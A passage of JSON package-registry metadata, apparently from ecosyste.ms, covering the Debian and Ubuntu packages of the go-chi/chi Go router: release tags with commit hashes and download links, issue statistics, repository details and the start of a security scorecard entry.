chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.266Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/golang-github-go-chi-chi?arch=source\u0026distro=debian-12","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/golang-github-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/golang-github-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/golang-github-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/golang-github-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/golang-github-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/golang-github-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/golang-github-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/golang-github-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/golang-github-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"debian-12","url":"https://packages.debian.org/bookworm","ecosystem":"debian","default":true,"packages_count":34734,"maintainers_count":0,"namespaces_count":4,"keywords_count":2652,"github":"debian","metadata":{"codename":"bookworm","funded_packages_count":809},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.459Z","updated_at":"2026-08-10T05:08:01.819Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/namespaces"}},{"id":13475587,"name":"golang-github-go-chi-chi","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/go-chi/chi","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/go-chi/chi","keywords_array":["universe/golang"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-10T03:32:42.460Z","latest_release_published_at":"2026-02-10T03:32:42.460Z","latest_release_number":"5.0.7-1","last_synced_at":"2026-03-10T04:14:08.680Z","created_at":"2026-02-10T03:32:41.907Z","updated_at":"2026-08-08T10:51:35.195Z","registry_url":"https://launchpad.net/ubuntu/+source/golang-github-go-chi-chi","install_command":"apt-get install golang-github-go-chi-chi","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"golang-github-go-chi-chi-dev","standards_version":"4.5.1","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-golang, golang-any","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 